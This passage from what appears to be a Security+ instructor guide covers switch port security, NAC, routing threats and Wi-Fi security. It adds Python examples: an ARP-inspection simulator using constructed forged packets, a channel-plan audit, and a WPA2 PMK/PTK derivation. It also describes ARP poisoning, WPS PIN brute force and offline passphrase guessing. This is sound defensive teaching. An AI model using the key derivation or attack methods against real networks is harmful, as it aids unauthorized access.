port. Additionally, the BPDU Guard setting should be applied. This causes a portfast-
configured port that receives a BPDU to become disabled (cisco.com/c/en/us/td/docs/
switches/lan/catalyst…/configuration/guide/stp_enha.html). Bridge Protocol
Data Units (BPDUs) are used to communicate information about the topology and are
not expected on access ports, so BPDU Guard protects against misconfiguration or a
possible malicious attack.

Physical Port Security and MAC Filtering
Show Slide(s): Physical Port Security and MAC Filtering

Physical Port Security
Because of the risks from rogue devices and the potential to create loops by incorrect
placement of patch cables, access to the physical switch ports and switch hardware
should be restricted to authorized staff, using a secure server room and/or lockable
hardware cabinets. To prevent the attachment of unauthorized client devices at
unsecured wall ports, the switch port that the wall port cabling connects to can be
disabled by using the management software, or the patch cable can be physically
removed from the port. Completely disabling ports in this way can introduce a lot
of administrative overhead and scope for error. Also, it doesn't provide complete
protection, as an attacker could unplug a device from an enabled port and connect
their own laptop. Consequently, more sophisticated methods of ensuring port
security have been developed.

Teaching Tip: Make sure students understand the difference between physical network
ports and TCP/UDP application ports.

MAC Filtering and MAC Limiting
Configuring MAC filtering on a switch means defining which MAC addresses are
allowed to connect to a particular port. This can be done by creating a list of valid
MAC addresses or by specifying a limit to the number of permitted addresses. For
example, if port security is enabled with a maximum of two MAC addresses, the switch
will record the first two MACs to connect to that port, but then drop any traffic from
machines with different MAC addresses that try to connect (cisco.com/c/en/us/td/
docs/ios/lanswitch/command/reference/lsw_book/lsw_m1.html). This provides a guard
against MAC flooding attacks.

DHCP Snooping
Another option is to configure Dynamic Host Configuration Protocol (DHCP)
snooping. DHCP is the protocol that allows a server to assign IP address information to
a client when it connects to the network. DHCP snooping inspects this traffic arriving on
access ports to ensure that a host is not trying to spoof its MAC address. It can also be
used to prevent rogue or spurious DHCP servers from operating on the network. With
DHCP snooping, only DHCP messages from ports configured as trusted are allowed.
Additionally, dynamic ARP inspection (DAI), which can be configured alongside DHCP
snooping, prevents a host attached to an untrusted port from flooding the segment
with gratuitous ARP replies. DAI maintains a trusted database of IP:ARP mappings
and ensures that ARP packets are validly constructed and use valid IP addresses
(cisco.com/c/en/us/td/docs/switches/lan/catalyst…/ios/…/configuration/guide/
book/snoodhcp.html).
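The following Python is an added example, not code from the CompTIA guide or from any switch vendor: it models how DAI layered on DHCP snooping would treat a constructed packet stream resembling the ARP poisoning capture described earlier (gratuitous replies claiming the .2 and .102 addresses, then a flood aimed at the gateway). The binding table, interface names and the 15 packets-per-second limit for untrusted ports are assumptions made for the example.

```python
"""Defender-side model of dynamic ARP inspection (DAI) layered on DHCP
snooping, as described above. ARP packets arriving on untrusted ports are
validated against the snooping binding table and rate-limited; trusted
(uplink) ports are exempt. Bindings, ports and packets are all constructed."""
from collections import Counter
from dataclasses import dataclass
from ipaddress import IPv4Address


@dataclass(frozen=True)
class ArpPacket:
    ts: float        # arrival time in seconds
    port: str        # ingress switch port
    eth_src: str     # Ethernet frame source MAC
    sender_mac: str  # ARP sender hardware address
    sender_ip: str   # ARP sender protocol address
    target_ip: str   # ARP target protocol address


# Constructed DHCP snooping binding table: IP -> (MAC, port).
BINDINGS = {
    "192.0.2.1":   ("00:11:22:33:44:01", "Gi1/0/1"),  # default gateway
    "192.0.2.2":   ("00:11:22:33:44:02", "Gi1/0/2"),
    "192.0.2.102": ("00:11:22:33:44:66", "Gi1/0/3"),
}
TRUSTED_PORTS = {"Gi1/0/24"}  # uplink towards the DHCP server
RATE_LIMIT_PPS = 15           # assumed per-port limit for untrusted ports


def valid_sender_ip(ip: str) -> bool:
    """Reject addresses that can never belong to a legitimate ARP sender."""
    addr = IPv4Address(ip)
    return not (addr.is_unspecified or addr.is_multicast
                or addr == IPv4Address("255.255.255.255"))


def inspect(pkt: ArpPacket, bindings=BINDINGS, trusted=TRUSTED_PORTS) -> tuple:
    """Validate one ARP packet; returns (action, reason)."""
    if pkt.port in trusted:
        return ("forward", "trusted port")
    if pkt.eth_src.lower() != pkt.sender_mac.lower():
        return ("drop", "frame source MAC differs from ARP sender MAC")
    if not valid_sender_ip(pkt.sender_ip):
        return ("drop", f"invalid sender IP {pkt.sender_ip}")
    bound = bindings.get(pkt.sender_ip)
    if bound is None:
        return ("drop", f"no snooping binding for {pkt.sender_ip}")
    mac, port = bound
    if mac.lower() != pkt.sender_mac.lower() or port != pkt.port:
        return ("drop", f"{pkt.sender_ip} is bound to {mac} on {port}")
    return ("forward", "binding matches")


def inspect_stream(packets, limit=RATE_LIMIT_PPS, trusted=TRUSTED_PORTS):
    """Run inspect() over a stream and err-disable any untrusted port that
    exceeds `limit` ARP packets within a one-second window."""
    per_second = Counter()
    errdisabled = set()
    verdicts = []
    for pkt in sorted(packets, key=lambda p: p.ts):
        if pkt.port in errdisabled:
            verdicts.append((pkt, "drop", "port err-disabled"))
            continue
        if pkt.port not in trusted:
            key = (pkt.port, int(pkt.ts))
            per_second[key] += 1
            if per_second[key] > limit:
                errdisabled.add(pkt.port)
                verdicts.append((pkt, "drop", "rate limit exceeded"))
                continue
        action, reason = inspect(pkt, trusted=trusted)
        verdicts.append((pkt, action, reason))
    return verdicts, errdisabled


ATTACKER = "00:11:22:33:44:4a"  # constructed; plugged into untrusted Gi1/0/5
# Gratuitous replies claiming the .2 and .102 addresses (as in the capture
# described above), then a legitimate reply from the real .2 host.
SAMPLE = [
    ArpPacket(0.0, "Gi1/0/5", ATTACKER, ATTACKER, "192.0.2.2", "192.0.2.102"),
    ArpPacket(0.1, "Gi1/0/5", ATTACKER, ATTACKER, "192.0.2.102", "192.0.2.2"),
    ArpPacket(0.2, "Gi1/0/2", "00:11:22:33:44:02", "00:11:22:33:44:02",
              "192.0.2.2", "192.0.2.1"),
]
# A burst of 20 forged replies for the gateway address within one second.
SAMPLE += [ArpPacket(1.0 + i / 100, "Gi1/0/5", ATTACKER, ATTACKER,
                     "192.0.2.1", "192.0.2.2") for i in range(20)]


def summarize(packets=SAMPLE) -> dict:
    verdicts, disabled = inspect_stream(packets)
    forwarded = sum(1 for _, action, _ in verdicts if action == "forward")
    return {"forwarded": forwarded, "dropped": len(verdicts) - forwarded,
            "errdisabled": sorted(disabled)}


if __name__ == "__main__":
    for pkt, action, reason in inspect_stream(SAMPLE)[0][:4]:
        print(f"{pkt.port} {pkt.sender_ip:<12} {action:<7} {reason}")
    print(summarize())
```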


Configuring ARP inspection on a Cisco switch.

Network Access Control
Show Slide(s): Network Access Control

Endpoint security is a set of security procedures and technologies designed to restrict
network access at a device level. Endpoint security contrasts with the focus on
perimeter security established by topologies such as DMZ and technologies such as
firewalls. Endpoint security does not replace these but adds defense in depth.

Teaching Tip: You can mention zero-trust and unified endpoint management (UEM)
solutions as modern implementations of NAC.

The IEEE 802.1X standard defines a port-based network access control (PNAC)
mechanism. PNAC means that the switch uses an AAA server to authenticate the
attached device before activating the port. Network access control (NAC) products
can extend the scope of authentication to allow administrators to devise policies or
profiles describing a minimum security configuration that devices must meet to be
granted network access. This is called a health policy. Typical policies check things such
as malware infection, firmware and patch level, personal firewall status, and the
presence of up-to-date virus definitions. A solution may also be to scan the registry or
perform file signature verification. The health policy is defined on a NAC management
server along with reporting and configuration tools.
Posture assessment is the process by which host health checks are performed against
a client device to verify compliance with the health policy. Most NAC solutions use
client software called an agent to gather information about the device, such as its anti-
virus and patch status, presence of prohibited applications, or anything else defined by
the health policy.

Defining policy violations in PacketFence Open Source NAC.
(Screenshot used with permission from packetfence.org.)


An agent can be persistent, in which case it is installed as a software application on the
client, or non-persistent. A non-persistent or dissolvable agent is loaded into memory
during posture assessment but is not installed on the device.

PacketFence supports the use of several scanning techniques, including vulnerability scanners, such
as Nessus and OpenVAS, Windows Management Instrumentation (WMI) queries, and log parsers.
(Screenshot used with permission from packetfence.org.)

Some NAC solutions can perform agentless posture assessment. This is useful when
the NAC solution must support a wide range of devices, such as smartphones, tablets,
and Internet of Things (IoT) devices, but less detailed information about the client is
available with an agentless solution.

Route Security
Show Slide(s): Route Security

Teaching Tip: Students may benefit from further reading on switching and routing
attacks. Cisco's website is a valuable source of information and advice. Point out that
you will discuss the functions of firewalls in more detail later in the course.

A successful attack against route security enables the attacker to redirect traffic from
its intended destination. On the Internet, this may allow the threat actor to herd users
to spoofed websites. On an enterprise network, it may facilitate circumventing firewalls
and security zones to allow lateral movement and data exfiltration.
Routes between networks and subnets can be configured manually, but most routers
automatically discover routes by communicating with each other. Dynamic routers
exchange information about routes using routing protocols. It is important that this
traffic be separated from channels used for other types of data. Routing protocols
do not always have effective integral security mechanisms, so they need to run in an
environment where access is very tightly controlled.


Sample routing table showing routes obtained from different sources, such as static configuration,
direct connection, and learned from the Border Gateway Protocol (BGP) routing protocol.

Routing is subject to numerous vulnerabilities, including:

• Spoofed routing information (route injection). Routing protocols that have no or
weak authentication are vulnerable to route table poisoning. This can mean that
traffic is misdirected to a monitoring port (sniffing), sent to a blackhole (non-existent
address), or continuously looped around the network, causing DoS. Most dynamic
routing protocols support message authentication via a shared secret configured on
each device. This can be difficult to administer, however. It is usually also possible to
configure how a router identifies the peers from which it will accept route updates.
This makes it harder to simply add a rogue router to the system. An attacker would
have to compromise an existing router and change its configuration.

• Source routing. This uses an option in the IP header to pre-determine the route
a packet will take through the network (strict) or waypoints that it must pass
through (loose). This can be used maliciously to spoof IP addresses and bypass
router/firewall filters. Routers can be configured to block source routed packets.

• Software exploits in the underlying operating system. Hardware routers and
switches have an embedded operating system. For example, Cisco devices typically
use the Internetwork Operating System (IOS). Something like IOS suffers from fewer
exploitable vulnerabilities than full network operating systems. It has a reduced
attack surface compared to a computer OS, such as Windows.

On the other hand, SOHO broadband routers can be particularly vulnerable to
unpatched exploits.


Review Activity:
Secure Switching and Routing
Answer the following questions:

1. Why might an ARP poisoning tool be of use to a threat actor performing
network reconnaissance?

The attacker could trick computers into sending traffic through the attacker's computer
(performing a MitM/on-path attack) and, therefore, examine traffic that would not
normally be accessible to him (on a switched network).

2. How could you prevent a malicious attacker from engineering a switching
loop from a host connected to a standard switch port?

Enable the appropriate guards (portfast and BPDU Guard) on access ports.

3. What port security feature mitigates ARP poisoning?

Dynamic ARP inspection, though this relies upon DHCP snooping being enabled.

4. What is a dissolvable agent?

Some network access control (NAC) solutions perform host health checks via a local
agent, running on the host. A dissolvable agent is one that is executed in the host's
memory and CPU but not installed to a local disk.


Topic 9C
Implement Secure Wireless
Infrastructure

EXAM OBJECTIVES COVERED
1.4 Given a scenario, analyze potential indicators associated with network attacks
3.4 Given a scenario, install and configure wireless security settings

Teaching Tip: This is a long topic, but hopefully students should understand the basics
already. Focus on WPA and wireless attacks.

Most organizations have both a wired and a wireless network for employees to access
while on the move within their facilities. Understanding the potential threats and
vulnerabilities will allow you to successfully secure the wireless components of an
organization's information systems infrastructure.

Wireless Network Installation Considerations
Show Slide(s): Wireless Network Installation Considerations

Wireless network installation considerations refer to the factors that ensure good
availability of authorized Wi-Fi access points. A network with patchy coverage is
vulnerable to rogue and evil twin attacks.

Teaching Tip: Technically, where multiple access points provision the same network, the
SSID should be referred to as an Extended SSID (ESSID). Take the opportunity to stress
the importance of the availability component of CIA. From a performance perspective,
a site survey confirms that the WLAN is accessible in all the areas it should be. From a
security perspective, you need to ensure that rogue WAPs cannot be positioned in weak
signal areas. Past versions of the exam objectives have been very keen on the idea of
limiting power output to prevent war driving. This doesn't seem to be the case with this
iteration, but make students aware that they may still see some questions taking this
approach.

Interaction Opportunity: There are no scripted activities for this topic, but if you can
demo some WAP configuration settings or have a laptop or smartphone with Wi-Fi
analyzer software, students may benefit from a more hands-on approach.

The 5 GHz band has more space to configure non-overlapping channels. Also note that
a WAP can use bonded channels to improve bandwidth, but this increases risks from
interference.

Wireless Access Point (WAP) Placement
An infrastructure-based wireless network comprises one or more wireless access
points, each connected to a wired network. The access points forward traffic to and
from the wired switched network. Each WAP is identified by its MAC address, also
referred to as its basic service set identifier (BSSID). Each wireless network is identified
by its name, or service set identifier (SSID).

Wireless networks can operate in either the 2.4 GHz or 5 GHz radio band. Each radio
band is divided into a number of channels, and each WAP must be configured to use
a specific channel. For performance reasons, the channels chosen should be as widely
spaced as possible to reduce different types of interference:

• Co-channel interference (CCI): when two WAPs in close proximity use the same
channel, they compete for bandwidth within that channel, as signals collide and
have to be re-transmitted.

• Adjacent channel interference (ACI): channels have only 5 MHz spacing, but Wi-Fi
requires 20 MHz of channel space. When the channels selected for WAPs are not
cleanly spaced, the interference pattern creates significant numbers of errors and
loss of bandwidth. For example, if two access points within range of one another are
configured in the 2.4 GHz band with channels … and …, they will not overlap. If a third
access point is added using channel …, it will use part of the spectrum used by both
the other WAPs, and all three networks will suffer from interference.
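As an added example (not from the CompTIA guide), this Python audits a constructed 2.4 GHz channel plan for the CCI and ACI conditions described above. It generalizes the text's example to any list of WAPs and to bonded channels, which it simplifies as a 40 MHz block centred on the configured channel; the centre frequencies follow the 802.11 2.4 GHz plan (channel n at 2412 + 5(n - 1) MHz), and the WAP names and channels are constructed.

```python
"""Channel plan audit for the 2.4 GHz band, illustrating the co-channel (CCI)
and adjacent-channel (ACI) interference discussed above. Channel n is centred
at 2412 + 5 * (n - 1) MHz for n in 1..13; a bonded channel is simplified as
40 MHz centred on the configured channel. The site below is constructed."""
from dataclasses import dataclass
from itertools import combinations

CHANNEL_SPACING_MHZ = 5   # adjacent 2.4 GHz channels are 5 MHz apart
DEFAULT_WIDTH_MHZ = 20    # a Wi-Fi channel occupies 20 MHz


@dataclass(frozen=True)
class WAP:
    name: str
    channel: int
    width_mhz: int = DEFAULT_WIDTH_MHZ  # 40 for a bonded channel


def centre_mhz(channel: int) -> int:
    """Centre frequency of a 2.4 GHz channel (1-13)."""
    if not 1 <= channel <= 13:
        raise ValueError(f"channel {channel} is outside the 2.4 GHz plan 1-13")
    return 2412 + CHANNEL_SPACING_MHZ * (channel - 1)


def spectrum(wap: WAP) -> tuple:
    """(low, high) edge frequencies in MHz occupied by a WAP."""
    c = centre_mhz(wap.channel)
    return (c - wap.width_mhz // 2, c + wap.width_mhz // 2)


def classify(a: WAP, b: WAP) -> str:
    """'cci' for the same channel, 'aci' for overlapping spectra, else 'clear'."""
    if a.channel == b.channel:
        return "cci"
    lo_a, hi_a = spectrum(a)
    lo_b, hi_b = spectrum(b)
    return "aci" if lo_a < hi_b and lo_b < hi_a else "clear"


def audit(waps) -> list:
    """Every interfering WAP pair, with the kind of interference.
    The caller is assumed to pass only WAPs that are within range of each other."""
    findings = []
    for a, b in combinations(waps, 2):
        kind = classify(a, b)
        if kind != "clear":
            findings.append((a.name, b.name, kind))
    return findings


# Constructed site: two cleanly spaced WAPs plus a third squeezed between them.
SITE = [WAP("AP1", 1), WAP("AP2", 6), WAP("AP3", 3)]

if __name__ == "__main__":
    for wap in SITE:
        print(f"{wap.name}: channel {wap.channel}, occupies {spectrum(wap)} MHz")
    for a, b, kind in audit(SITE):
        print(f"{a} and {b}: {kind.upper()}")
    # Bonding AP2 to 40 MHz makes it collide with AP1 as well.
    print(audit([WAP("AP1", 1), WAP("AP2", 6, 40)]))
```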


Site Surveys and Heat Maps
The coverage and interference factors mean that WAPs must be positioned and
configured so that the whole area is covered, but that they overlap as little as possible.
A site survey is used to measure signal strength and channel usage throughout the
area to cover. A site survey starts with an architectural map of the site, with features
that can cause background interference marked. These features include solid walls,
reflective surfaces, motors, microwave ovens, and so on. The survey is performed with
a Wi-Fi-enabled laptop or mobile device with Wi-Fi analyzer software installed. The Wi-Fi
analyzer records information about the signal obtained at regularly spaced points as
the surveyor moves around the area.
These readings are combined and analyzed to produce a heat map, showing where
a signal is strong (red) or weak (green/blue), and which channel is being used and
how they overlap. This data is then used to optimize the design, by adjusting transmit
power to reduce a WAP's range, changing the channel on a WAP, adding a new WAP, or
physically moving a WAP to a new location.

Controller and Access Point Security
Show Slide(s): Controller and Access Point Security

Where a site survey ensures availability, the confidentiality and integrity properties of
the network are ensured by configuring authentication and encryption. These settings
could be configured manually on each WAP, but this would be onerous in an enterprise
network with tens or hundreds of WAPs. If access points are individually managed, this
can lead to configuration errors and can make it difficult to gain an overall view of the
wireless deployment, including which clients are connected to which access points and
which clients or access points are handling the most traffic.
Rather than configure each device individually, enterprise wireless solutions implement
wireless controllers for centralized management and monitoring. A controller can be
a hardware appliance or a software application run on a server.

UniFi Wireless Network management console.
(Screenshot used with permission from Ubiquiti Networks.)

An access point whose firmware contains enough processing logic to be able to
function autonomously and handle clients without the use of a wireless controller is
known as a fat WAP, while one that requires a wireless controller in order to function is
known as a thin WAP.
Controllers and access points must be made physically secure, as tampering could
allow a threat actor to insert a rogue/evil twin WAP to try to intercept logons. These
devices must be managed like switches and routers, using secure management
interfaces and strong administrative credentials.

Show Slide(s): Wi-Fi Protected Access

Wi-Fi Protected Access

As well as the site design, a wireless network must be configured with security settings. Without encryption, anyone within range can intercept and read packets passing over the wireless network. These choices are determined by device support for the various Wi-Fi security standards, by the type of authentication infrastructure, and by the purpose of the WLAN. The security standard determines the cryptographic protocols that are supported, the means of generating the encryption key, and available methods for authenticating wireless stations when they try to join or associate with the network.

Teaching Tip: WEP, WPA, and TKIP have been removed from the objectives, but it seems safer to mention them, if only as comparison to WPA2/WPA3. We also mention Wi-Fi 6 as a note. This is not on the current syllabus, but students will quickly encounter it, so it seems worthy of inclusion.

The first version of Wi-Fi Protected Access (WPA) was designed to fix critical vulnerabilities in the earlier Wired Equivalent Privacy (WEP) standard. Like WEP, version 1 of WPA uses the RC4 stream cipher but adds a mechanism called the Temporal Key Integrity Protocol (TKIP) to make it stronger.

Configuring a TP-Link SOHO access point with wireless encryption and authentication settings. In this example, the 2.4 GHz band allows legacy connections with WPA2-Personal security, while the 5 GHz network is for 802.11ax (Wi-Fi 6) capable devices using WPA3-SAE authentication. (Screenshot used with permission from TP-Link Technologies.)

Interaction Opportunity: You could ask students to try some of the emulators available from vendor sites. The emulator shown in the screenshot is at emulator.tp-link.com/Archer_AX20v1_US_simulator/#wirelessSettingsAdv.

Neither WEP nor the original WPA version are considered secure enough for continued use. WPA2 uses the Advanced Encryption Standard (AES) cipher with 128-bit keys, deployed within the Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP). AES replaces RC4 and CCMP replaces TKIP. CCMP provides authenticated encryption, which is designed to make replay attacks harder.

Weaknesses have also been found in WPA2, however, which has led to its intended replacement by WPA3. The main features of WPA3 are as follows:

• Simultaneous Authentication of Equals (SAE)—replaces WPA's 4-way handshake authentication and association mechanism with a protocol based on Diffie-Hellman key agreement.

• Enhanced Open—enables encryption for the open authentication method.

• Updated cryptographic protocols—replaces AES CCMP with the AES Galois Counter Mode Protocol (GCMP) mode of operation. Enterprise authentication methods must use 192-bit AES, while personal authentication can use either 128-bit or 192-bit.

• Management protection frames—mandates use of these to protect against key recovery attacks.

Wi-Fi performance also depends on support for the latest 802.11 standards. The most recent generation (802.11ax) is being marketed as Wi-Fi 6. The earlier standards are retroactively named Wi-Fi 5 (802.11ac) and Wi-Fi 4 (802.11n). The performance standards are developed in parallel with the WPA security specifications. Most Wi-Fi 6 devices and some Wi-Fi 5 and Wi-Fi 4 products should support WPA3, either natively or with a firmware/driver update.

Show Slide(s): Wi-Fi Authentication Methods

Wi-Fi Authentication Methods

In order to secure a network, you need to be able to confirm that only valid users are connecting to it. Wi-Fi authentication comes in three types: personal, open, and enterprise. Within the personal category, there are two methods: pre-shared key authentication (PSK) and simultaneous authentication of equals (SAE).

Teaching Tip: The changes between versions of WPA are all designed to try to prevent recovery of the hash so that it cannot be subjected to dictionary/brute force attacks, but researchers are usually quick to find weaknesses. Discuss how different types of networks should account for these risks.

WPA2 Pre-Shared Key Authentication

In WPA2, pre-shared key (PSK) authentication uses a passphrase to generate the key that is used to encrypt communications. It is also referred to as group authentication because a group of users share the same secret. When the access point is set to WPA2-PSK mode, the administrator configures a passphrase of between 8 and 63 ASCII characters. This is converted to a 256-bit HMAC expressed as a 64-character hex value using the PBKDF2 key stretching algorithm. This HMAC is referred to as the pairwise master key (PMK). The same secret must be configured on the access point and on each node that joins the network. The PMK is used as part of WPA2's 4-way handshake to derive various session keys.

All types of Wi-Fi personal authentication have been shown to be vulnerable to attacks that allow dictionary or brute force attacks against the passphrase. At a minimum, the passphrase must be at least 14 characters long to try to mitigate risks from cracking.
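The PSK-to-PMK derivation and the 4-way handshake key expansion just described, as an added example (not code from the guide): PBKDF2-HMAC-SHA1 with the SSID as salt produces the PMK, and the IEEE 802.11i PRF expands it with both MAC addresses and both nonces into the per-session keys. The MAC addresses and nonces are constructed sample values; the "password"/"IEEE" pair is the IEEE 802.11i test vector input.

```python
"""WPA2 Personal key hierarchy: passphrase -> PMK -> PTK (added example, not from the guide)."""
import hashlib
import hmac

# Constructed sample values for the demonstration (not real devices).
AP_MAC = bytes.fromhex("020000000001")
STA_MAC = bytes.fromhex("020000000002")
ANONCE = bytes(range(32))        # AP nonce, 32 bytes
SNONCE = bytes(range(32, 64))    # station nonce, 32 bytes


def check_passphrase(passphrase: str, minimum_length: int = 14) -> bool:
    """Enforce WPA2-PSK passphrase rules: 8 to 63 printable ASCII characters.

    The guide's advice is at least 14 characters; the minimum is a parameter so a
    site policy can be stricter. Returns True when the passphrase is acceptable.
    """
    if not passphrase.isascii() or not passphrase.isprintable():
        return False
    if not 8 <= len(passphrase) <= 63:
        return False
    return len(passphrase) >= minimum_length


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PSK -> PMK: PBKDF2-HMAC-SHA1, SSID as salt, 4096 iterations, 256-bit output.

    Every station and the AP compute this same value from the shared passphrase;
    its 64-character hex form is what appears in AP configurations.
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, out_len: int) -> bytes:
    """IEEE 802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i), i = 0, 1, ..."""
    out = b""
    counter = 0
    while len(out) < out_len:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:out_len]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
               anonce: bytes, snonce: bytes) -> dict:
    """4-way handshake key expansion: PMK + both MACs + both nonces -> 384-bit PTK (CCMP).

    The PTK splits into the KCK (integrity of handshake messages), the KEK (wraps the
    group key) and the TK (encrypts data frames). Fresh nonces give fresh session keys
    even though the PMK is the same for every association on the network.
    """
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    ptk = prf(pmk, b"Pairwise key expansion", data, 48)
    return {"kck": ptk[:16], "kek": ptk[16:32], "tk": ptk[32:48]}


if __name__ == "__main__":
    pmk = derive_pmk("password", "IEEE")   # IEEE 802.11i test vector inputs
    print("PMK:", pmk.hex())
    keys = derive_ptk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)
    print("TK :", keys["tk"].hex())
```

Because the PMK is fixed for the life of the passphrase, anything that lets an attacker test passphrase guesses offline (a captured handshake) is only bounded by the 4096 PBKDF2 iterations, which is why the guide insists on passphrase length.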

WPA3 Personal Authentication

While WPA3 still uses a passphrase to authenticate stations in personal mode, it changes the method by which this secret is used to agree session keys. The scheme used is also referred to as Password Authenticated Key Exchange (PAKE). In WPA3, the Simultaneous Authentication of Equals (SAE) protocol replaces the 4-way handshake, which has been found to be vulnerable to various attacks. SAE uses the Dragonfly handshake, which is basically Diffie-Hellman over elliptic curves key agreement, combined with a hash value derived from the password and device MAC address to authenticate the nodes. With SAE, there should be no way for an attacker to sniff the handshake to obtain the hash value and try to use an offline brute force or dictionary attack to recover the password. Dragonfly also implements ephemeral session keys, providing forward secrecy.

The configuration interfaces for access points can use different labels for these methods. You might see WPA2-Personal and WPA3-SAE rather than WPA2-PSK and WPA3-Personal, for example. Additionally, an access point can be configured for WPA3 only or with support for legacy WPA2 (WPA3-Personal Transition mode). Researchers already found flaws in WPA3-Personal, one of which relies on a downgrade attack to use WPA2 (wi-fi.org/security-update-april-2019).

Show Slide(s): Wi-Fi Protected Setup

Wi-Fi Protected Setup

As setting up an access point securely is relatively complex for residential consumers, vendors have developed a system to automate the process called Wi-Fi Protected Setup (WPS). To use WPS, both the access point and wireless station (client device) must be WPS-capable. Typically, the devices will have a push button. Activating this on the access point and the adapter simultaneously will associate the devices using a PIN, then associate the adapter with the access point using WPA2. The system generates a random SSID and PSK. If the devices do not support the push button method, the PIN (printed on the AP) can be entered manually.

Unfortunately, WPS is vulnerable to a brute force attack. While the PIN is eight characters, one digit is a checksum and the rest are verified as two separate PINs of four and three characters. These separate PINs are many orders of magnitude simpler to brute force, typically requiring just hours to crack. On some models, disabling WPS through the admin interface does not actually disable the protocol, or there is no option to disable it. Some APs can lock out an intruder if a brute force attack is detected, but in some cases the attack can just be resumed when the lockout period expires. To counter this, the lockout period can be increased. However, this can leave APs vulnerable to a denial of service (DoS) attack. When provisioning a WAP, it is essential to verify what steps the vendor has taken to make their implementation secure and the firmware level required to assure security.

The Easy Connect method, announced alongside WPA3, is intended to replace WPS as a method of securely configuring client devices with the information required to access a Wi-Fi network. Easy Connect is a brand name for the Device Provisioning Protocol (DPP). Each participating device must be configured with a public/private key pair. Easy Connect uses quick response (QR) codes or near field communication (NFC) tags to communicate each device's public key. A smartphone is registered as an Easy Connect configurator app, and associated with the AP using its QR code. Each client device can then be associated by scanning its QR code or NFC tag in the configurator app. As well as fixing the security problems associated with WPS, this is a straightforward means of configuring headless Internet of Things (IoT) devices with Wi-Fi connectivity.

A quick response (QR) code is a barcode standard for encoding arbitrary alphanumeric or binary strings within a square block pattern. The codes can be scanned using any type of digital camera.

Show Slide(s): Open Authentication and Captive Portals

Open Authentication and Captive Portals

Teaching Tip: Make sure students understand risks from open access points.

Selecting open authentication means that the client is not required to authenticate. This mode would be used on a public AP (or hotspot). In WPA2, this also means that data sent over the link is unencrypted. Open authentication may be combined with a secondary authentication mechanism managed via a browser. When the client associates with the open hotspot and launches the browser, the client is redirected to a captive portal or splash page. This will allow the client to authenticate to the hotspot provider's network (over HTTPS, so the login is secure). The portal may also be designed to enforce terms and conditions and/or take payment to access the Wi-Fi service.

When using open wireless, users must ensure they send confidential web data only over HTTPS connections and only use email, VoIP, IM, and file transfer services with SSL/TLS enabled. Another option is for the user to join a virtual private network (VPN). The user would associate with the open hotspot then start the VPN connection. This creates an encrypted tunnel between the user's computer and the VPN server. This allows the user to browse the web or connect to email services without anyone eavesdropping on the open Wi-Fi network being able to intercept those communications. The VPN could be provided by the user's company or they could use a third-party VPN service provider. Of course, if using a third party, the user needs to be able to trust them implicitly. The VPN must use certificate-based tunneling to set up the "inner" authentication method.

WPA3 can implement a mode called Wi-Fi Enhanced Open, which uses opportunistic wireless encryption (OWE). OWE uses the Dragonfly handshake to agree ephemeral session keys on joining the network. This means that one station cannot sniff the traffic from another station, because they are using different session keys. There is still no authentication of the access point, however.

Show Slide(s): Enterprise/IEEE 802.1X Authentication

Enterprise/IEEE 802.1X Authentication

Teaching Tip: Note that this is the same general process that we looked at already for RADIUS and NAC. The access point is the authenticator and the wireless station is the supplicant. The main difference is the use of the credential to generate session encryption keys. Note that the access point does NOT know the master key, otherwise it would be able to authenticate stations without the RADIUS server. It's not repeated here, but remind students that the AP must be configured with the IP address of the RADIUS server and the shared secret.

The main problems with personal modes of authentication are that distribution of the key or passphrase cannot be secured properly, and users may choose unsecure phrases. Personal authentication also fails to provide accounting, as all users share the same key.

As an alternative to personal authentication, the enterprise authentication method implements IEEE 802.1X to use an Extensible Authentication Protocol (EAP) mechanism. 802.1X defines the use of EAP over Wireless (EAPoW) to allow an access point to forward authentication data without allowing any other type of network access. It is configured by selecting WPA2-Enterprise or WPA3-Enterprise as the security method on the access point.

With enterprise authentication, when a wireless station requests an association, the AP enables the channel for EAPoW traffic only. It passes the credentials of the supplicant to an AAA (RADIUS or TACACS+) server on the wired network for validation. When the supplicant has been authenticated, the AAA server transmits a master key (MK) to the supplicant. The supplicant and authentication server then derive the same pairwise master key (PMK) from the MK. The AAA server transmits the PMK to the access point. The wireless station and access point use the PMK to derive session keys, using either the WPA2 4-way handshake or WPA3 SAE methods.

See tldp.org/HOWTO/8021X-HOWTO/intro.html for more detailed information about the keys used.

Using Cisco's Virtual Wireless LAN Controller to set security policies for a WLAN; this policy enforces use of WPA2 and the use of 802.1X (Enterprise) authentication. (Screenshot used with permission from Cisco.)

Show Slide(s): Extensible Authentication Protocol

Extensible Authentication Protocol

Teaching Tip: In the exam objectives, the specific EAP types are strongly associated with wireless security, so they are covered here rather than with other authentication technologies, but they are applicable to any sort of network access device.

The Extensible Authentication Protocol (EAP) defines a framework for negotiating authentication mechanisms rather than the details of the mechanisms themselves. Vendors can write extensions to the protocol to support third-party security devices. EAP implementations can include smart cards, one-time passwords, biometric identifiers, or simpler username and password combinations.

EAP-TLS is one of the strongest types of authentication and is very widely supported. An encrypted Transport Layer Security (TLS) tunnel is established between the supplicant and authentication server using public key certificates on the authentication server and supplicant. As both supplicant and server are configured with certificates, this provides mutual authentication. The supplicant will typically provide a certificate using a smart card or a certificate could be installed on the client device, possibly in a Trusted Platform Module (TPM).

Configuring Network Policy Server to authenticate wireless clients using 802.1X EAP-TLS. (Screenshot used with permission from Microsoft.)

Show Slide(s): PEAP, EAP-TTLS, and EAP-FAST

PEAP, EAP-TTLS, and EAP-FAST

Teaching Tip: Where EAP-TLS authenticates via a machine certificate or smart card, other EAP types set up a secure tunnel for user authentication. This means that client certificates do not have to be deployed and managed.

Provisioning certificates to each wireless device is a considerable management challenge. Other types of EAP are designed to provide secure tunneling with server-side certificates only.

Protected Extensible Authentication Protocol (PEAP)

